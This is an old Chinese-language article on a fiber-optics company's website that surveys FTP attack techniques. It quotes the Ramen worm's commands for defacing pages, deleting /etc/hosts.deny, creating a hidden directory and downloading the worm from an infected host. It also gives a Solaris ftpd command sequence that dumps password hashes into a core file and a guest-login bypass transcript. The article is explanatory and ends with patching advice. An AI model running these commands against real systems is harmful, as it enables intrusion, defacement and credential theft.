当前位置:首页 > 技术与方案 > 安全防范相关

FTP 攻击手段

(2012-09-20 06:53:16)

FTP是网络中常用的通讯工具,是大ISP和ICP 网络中必不可少的服务之一。但是FTP 的安全隐患也是让ISP和ICP最头疼的事。很多ICP都因为FTP的漏洞,而使得整个操作系统崩溃。

FTP测试模块包含了多种网络安全测试工具和手段,主要包括:FTP - 匿名测试、FTP - 后门测试、FTP - bounce 测试、FTP - cwd root 测试、FTP - root 测试、FTP - passwd 测试、FTP - USER 溢出测试、FTP - realpath 测试、FTP - root 可写测试、FTP - siteexec 测试、FTP - 其它缓存溢出、FTP - 可写目录测试、FTP - NT 测试、FTP - Windows FTP 测试。

在RedLinux 下就有以下4种针对FTP的蠕虫,导致缓存溢出后系统崩溃。
⒈ w62:修改过的wu-ftpd 2.6的expolit for RedHat 6.2
⒉ w7:修改过的wu-ftpd 2.6的expolit for RedHat 7.0
⒊ wh.sh:运行exploit的脚本
⒋ wu62:修改过的wu-ftp 2.6的exploit它的感染过程是这样的:

入侵者先攻击进入一台redhat6.2或者7.0,上传此蠕虫,运行start.sh脚本,感染第一台redhat主机。
蠕虫会先通过start.sh查找主机的web主页面,并且用自己的页面替换它
nohup find / -name “index.html” -exec /bin/cp index.html {} ; &
然后删除hosts.deny文件
rm -f /etc/hosts.deny
接着运行getip.sh取这台主机的ip地址,简单判断此系统是redhat6.2还是7.0。安装相应的服务文件,Ramen worm扫描随机产生的地址范围,根据取回的ftp banner和端口信息来判断Redhat系统.进行相应的入侵。
当Ramen进入另外一个系统后,会在系统上做如下动作:
首先在/usr/src/ 建立隐藏目录 .poop/
mkdir /usr/src/.poop;cd /usr/src/.poop
接着通过lynx这个文本浏览器来取得已经中了Ramen的机器上的蠕虫文件.
lynx -sourcehttp://%s:27374 > /usr/src/.poop/ramen.tgz
解开此压缩包,并且复制一份到/tmp目录下
运行start.sh 感染系统.并且发一份mail到gb31337@hotmail.comgb31337@yahoo.com.通知此蠕虫的主人。然后蠕虫的主人将用EMAIL中的信息,轻松进入你的系统。

下面是一个Solaris 操作系统中FTPD的攻击实例:
该方法利用了Solaris 操作系统中FTPD的一个BUG,使得用户可以获得该机的口令文件。具体过程如下:
1.通过 ftp 正常登录到目的主机上
2.输入如下命令序列:
ftp> user root wrongpasswd
ftp> quote pasv
3.这时,ftpd会报错退出,同时会在当前目录下生成一个core,口令文件就包含在这个core中。
4.再次进入FTP >get core
补充:虽然在core只有一部分shadow,但是对于系统来说已经是致命的打击了
5、破坏FTP服务
ftp -n
220 victim.com FTP server ready.
ftp> quote user ftp
331 Guest login ok, send ident as password.
ftp> quote cwd ~root
530 Please login with USER and PASS.
ftp> quote pass ftp
230 Guest login ok, access restrictions apply.
ftp> ls -al / (or whatever)
以上是FTP 在不同操作系统上的漏洞和攻击手段。当然不是没有弥补的办法。如果你及时的打系统补丁,就会避免这些问题。

1作者:向朝华


 

更多
关闭窗口 打印 
网站首页    -    联系我们    -   收藏本站    -    网站地图                                                               客户服务热线:0571-85023000
本网站所有网页信息已申请知识产权和著作权保护,版权归四海光纤公司所有,未经授权禁止任何人复制或镜像,违者必究。
公司主营:杭州光纤光缆视频会议系统,是专业的通信网络工程、视频会议系统建设专家

中华人民共和国备案号:浙ICP备10018243号